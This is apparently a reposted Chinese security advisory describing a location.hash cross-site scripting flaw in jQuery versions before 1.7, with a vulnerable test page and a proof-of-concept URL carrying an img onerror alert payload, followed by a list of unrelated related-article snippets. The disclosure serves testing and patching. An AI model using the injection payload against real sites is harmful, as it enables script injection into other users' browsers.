版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷

jquery下载地址:https://code.jquery.com/jquery/


影响范围:

    版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞

已测试成功版本:

    jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js

    jquery-1.5所有版本

    jquery-1.4所有版本

    jquery-1.3所有版本

    jquery-1.2所有版本

测试:

启动nginx,并建立index.html页面,内容如下:

漏洞发现者给的测试代码:

<html>

<head>

    <title>JQuery-xss-test</title>

    <script src="-test-https://code.jquery.com/jquery-1.6.1.min.js"></script>

    <script>

    $(function(){

    try { $(location.hash) } catch(e) {}

    })

    </script>

</head>

<body>

    Jquery xss test.

</body>

</html>

访问地址:

http://localhost/#<img src=/ οnerrοr=alert(/F4ckTeam/)>

测试截图:

技术分享



本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/387555.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

RabbitMQ学习总结(6)——消息的路由分发机制详解

RabbitMQ学习总结(6)——消息的路由分发机制详解

2019独角兽企业重金招聘Python工程师标准>>> 一、Routing(路由) (using the Java client)在前面的学习中&#xff0c;构建了一个简单的日志记录系统&#xff0c;能够广播所有的日志给多个接收者&#xff0c;在该部分学习中&#xff0c;将添加一个新的特点&#xff0…
阅读更多...
Kaggle爆文:一个框架解决几乎所有机器学习问题

Kaggle爆文:一个框架解决几乎所有机器学习问题

上周一个叫 Abhishek Thakur 的数据科学家&#xff0c;在他的 Linkedin 发表了一篇文章 Approaching (Almost) Any Machine Learning Problem&#xff0c;介绍他建立的一个自动的机器学习框架&#xff0c;几乎可以解决任何机器学习问题&#xff0c;项目很快也会发布出来。 这篇…
阅读更多...
C# HttpWebRequest GET HTTP HTTPS 请求

C# HttpWebRequest GET HTTP HTTPS 请求

这个需求来自于我最近练手的一个项目&#xff0c;在项目中我需要将一些自己发表的和收藏整理的网文集中到一个地方存放&#xff0c;如果全部采用手工操作工作量大而且繁琐&#xff0c;因此周公决定利用C#来实现。在很多地方都需要验证用户身份才可以进行下一步操作&#xff0c;…
阅读更多...
HttpStatusCode

HttpStatusCode

https://docs.microsoft.com/en-us/dotnet/api/system.net.httpstatuscode?viewnetframework-4.7.2 422 UnprocessableEntity What HTTP status response code should I use if the request is missing a required parameter? Status 422 seems most appropiate based on the…
阅读更多...
numpy 和tensorflow 中的乘法

numpy 和tensorflow 中的乘法

矩阵乘法&#xff1a;tf.matmul() np.dot() &#xff0c; 逐元素乘法&#xff1a;tf.multiply() np.multiply()转载于:https://www.cnblogs.com/lizhiqing/p/10307760.html
阅读更多...
启用了不安全的HTTP方法

启用了不安全的HTTP方法

安全风险&#xff1a;可能会在Web 服务器上上载、修改或删除Web 页面、脚本和文件。可能原因&#xff1a;Web 服务器或应用程序服务器是以不安全的方式配置的。修订建议&#xff1a;如果服务器不需要支持WebDAV&#xff0c;请务必禁用它&#xff0c;或禁止不必要的HTTP 方法。方…
阅读更多...
Mysql学习总结(4)——MySql基础知识、存储引擎与常用数据类型

Mysql学习总结(4)——MySql基础知识、存储引擎与常用数据类型

2019独角兽企业重金招聘Python工程师标准>>> 1、基础知识 1.1、数据库概述 简单地说&#xff1a;数据库&#xff08;Database或DB&#xff09;是存储、管理数据的容器&#xff1b;严格地说&#xff1a;数据库是“按照某种数据结构对数据进行组织、存储和管理的容器”…
阅读更多...
django权限二(多级菜单的设计以及展示)

django权限二(多级菜单的设计以及展示)

多级权限菜单设计级标题栏 我们现在只有数据展示,要进入其他url还需要手动的输入路径,非常的麻烦,所以我们要设计 一个导航栏以及侧边多级菜单栏,这个展示是通过stark组件的设计的增删改查页面,而 每一个 页面我们都需要有导航栏和侧边的权限菜单栏,所以把这个公共的部分提起到…
阅读更多...
6.17 dokcer(一)Compose 简介

6.17 dokcer(一)Compose 简介

Compose 简介 Compose 项目是 Docker 官方的开源项目&#xff0c;负责实现对 Docker 容器集群的快速编排。从功能上看&#xff0c;跟 OpenStack 中的 Heat 十分类似。 其代码目前在 https://github.com/docker/compose 上开源。 Compose 定位是 「定义和运行多个 Docker 容器的…
阅读更多...
【系统架构理论】一篇文章精通:Spring Cloud Netflix Eureka

【系统架构理论】一篇文章精通:Spring Cloud Netflix Eureka

是官方文档的总结 http://spring.io/projects/spring-cloud-netflix#overview 讲解基于2.0.2版本官方文档 https://cloud.spring.io/spring-cloud-static/spring-cloud-netflix/2.0.2.RELEASE/single/spring-cloud-netflix.html Netflix提供了以下功能&#xff1a; 服务发现&am…
阅读更多...
Flink DataStream 编程入门

Flink DataStream 编程入门

流处理是 Flink 的核心&#xff0c;流处理的数据集用 DataStream 表示。数据流从可以从各种各样的数据源中创建&#xff08;消息队列、Socket 和 文件等&#xff09;&#xff0c;经过 DataStream 的各种 transform 操作&#xff0c;最终输出文件或者标准输出。这个过程跟之前文…
阅读更多...
腾讯手游如何提早揭露游戏外挂风险?

腾讯手游如何提早揭露游戏外挂风险?

目前腾讯SR手游安全测试限期开放免费专家预约&#xff01;点击链接&#xff1a;手游安全测试立即预约&#xff01; 作者&#xff1a;sheldon&#xff0c;腾讯高级安全工程师 商业转载请联系腾讯WeTest获得授权&#xff0c;非商业转载请注明出处。 文中动图无法显示&#xff0c…
阅读更多...
基于ARM Cortex-M0+ 的Bootloader 参考

基于ARM Cortex-M0+ 的Bootloader 参考

源&#xff1a; 基于ARM Cortex-M0内核的bootloader程序升级原理及代码解析转载于:https://www.cnblogs.com/LittleTiger/p/10312784.html
阅读更多...
小猿圈web前端之网站性能优化方案

小猿圈web前端之网站性能优化方案

现在前端不仅要能做出一个网站页面&#xff0c;还要把这个页面做的炫酷&#xff0c;那需要很大程度的优化&#xff0c;那么怎么优化才更好呢&#xff1f;小猿圈总结了一下自己优化的方案&#xff0c;感兴趣的朋友可以看一下。一般网站优化都是优化后台&#xff0c;如接口的响应…
阅读更多...
下面介绍一个开源的OCR引擎Tesseract2。值得庆幸的是虽然是开源的但是它的识别率较高,并不比其他引擎差劲。网上介绍Tessnet2也是当时时间排名第三的识别引擎,只是后来慢慢不维护了,目前是G

下面介绍一个开源的OCR引擎Tesseract2。值得庆幸的是虽然是开源的但是它的识别率较高,并不比其他引擎差劲。网上介绍Tessnet2也是当时时间排名第三的识别引擎,只是后来慢慢不维护了,目前是G

下面介绍一个开源的OCR引擎Tesseract2。值得庆幸的是虽然是开源的但是它的识别率较高&#xff0c;并不比其他引擎差劲。网上介绍Tessnet2也是当时时间排名第三的识别引擎&#xff0c;只是后来慢慢不维护了&#xff0c;目前是Google在维护&#xff0c;大家都知道Google 在搞电子…
阅读更多...
js 更改json的 key

js 更改json的 key

let t data.map(item > {return{fee: item[费用],companyName1: item.companyName,remark1: item.remark,beginTime1: item.beginTime,endTime1: item.endTime}})console.log(t) 源地址&#xff1a;https://www.cnblogs.com/Marydon20170307/p/8676611.html转载于:https:/…
阅读更多...
1.4版本上线(第八次会议)

1.4版本上线(第八次会议)

在小组成员连夜赶工的奋斗下&#xff0c;终于在昨天深夜成功实现了UI界面功能 至此&#xff0c;我们的系统终于真正可实用而不是局限在命令行进行互动了 由于python嵌入数据库功能实现难度较大&#xff0c;迫于时间的局限性&#xff0c;我们选择了用json文件与txt文件进行替代&…
阅读更多...
分UV教程

分UV教程

第一步 首先&#xff0c;打开一个练习场景“空中预警机1.max”&#xff08;这事小弟平时的练习做的不好献丑了&#xff09;。&#xff08;图01&#xff09; 图01 第二步 这里我们拿机翼来举例子&#xff0c;隐藏除机翼意外的其他模型。&#xff08;图02&#xff09; 图02 第三步…
阅读更多...
k8s系列--- dashboard认证及分级授权

k8s系列--- dashboard认证及分级授权

http://blog.itpub.net/28916011/viewspace-2215214/ 因版本不一样&#xff0c;略有改动 Dashboard官方地址&#xff1a; https://github.com/kubernetes/dashboard dashbord是作为一个pod来运行&#xff0c;需要serviceaccount账号来登录。 先给dashboad创建一个专用的认证信息…
阅读更多...
JAVA项目开发

JAVA项目开发

16年java软件开发经验&#xff0c;全职项目开发&#xff0c;项目可签合同、开普票和专票。 主要承接项目&#xff1a; 1、网站开发项目 自主开发千帆CMS动态发布系统&#xff0c;基于java/springboot2/jpa/easyui开发&#xff0c;简单易用&#xff0c;后台与前端分离&#xff0…
阅读更多...
最新文章

Copyright @ 2022~2023